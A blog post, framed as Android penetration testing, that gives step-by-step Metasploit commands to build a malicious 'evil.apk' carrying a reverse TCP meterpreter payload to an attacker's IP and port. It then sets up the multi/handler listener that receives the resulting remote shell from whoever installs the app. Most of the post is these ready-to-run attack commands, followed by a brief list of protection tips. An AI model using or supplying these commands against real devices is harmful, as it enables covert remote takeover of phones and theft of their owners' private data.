Android Penetration Testing Using Metasploit Framework

Android devices have become quiet Ubiquitous and the usage is increasing with every passing second . And so is the Dependency on these Android Devices . Though the security of the Android Devices has always been questionable . We all have lots of private data on our Android Devices . Hence Penetration Testing Android Devices comes as an interesting topic to me . In this post I will show you how to Penetration Test any Android Device using just the Metasploit Framework on your Kali Linux.


Android is Linux based and generally has a .apk format whose contents can be seen by unzipping with Winrar  . APK stands for Android Application package file and is used for distributing and installing the applications on Android Devices  .

Android Penetration testing With Metasploit

Requirements :
  • Metasploit Framework .
  • Android Smart Phone or an Android Emulator .
Step 1 : Create a malicious APK file : Metasploit ships in with everything you need to create a malicious apk file .
Command : msfpayload android/meterpreter/reverse_tcp LHOST=<YOUR-IP> LPORT=443 R > evil.apk
Explaination : This command basically creates a reverse TCP payload (the victim will establish a reverse connection to the Attacker over TCP on the specified IP and the Port Number) .
Step 2  : Setup a Listener : Since we just created a malicious android application that will establish a reverse TCP connection , at the attacker side we need to set up a metasploit listener that will be here to accept the connection .
Command :
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <YOUR-IP>
set LPORT 443
exploit
Multi/Handler is a stub that is able to handle the connect backs of almost all metasploit payloads . With the above commands , we just set up a ” listner ” for the metasploit generated malicious application(evil.apk) to connect back to the attacker . It is here we expect to get a Meterpreter Shell if all went Right .
Now All is Set !! All one needs to do is to install and start the malicious application the an android device or an emulator and see what all fruitfull information we can get from this application .android_hack5

How to Protect your Android Device :

  • Don’t install APK’s from the unknown source.
  • Make sure you have the Install Applications From Unknown Source Options in the Settings menu disabled .
  • Use a Good Antivirus Protection vendor .

Comments

Popular posts from this blog

How To Hack ADSL Router Using NMAP Tool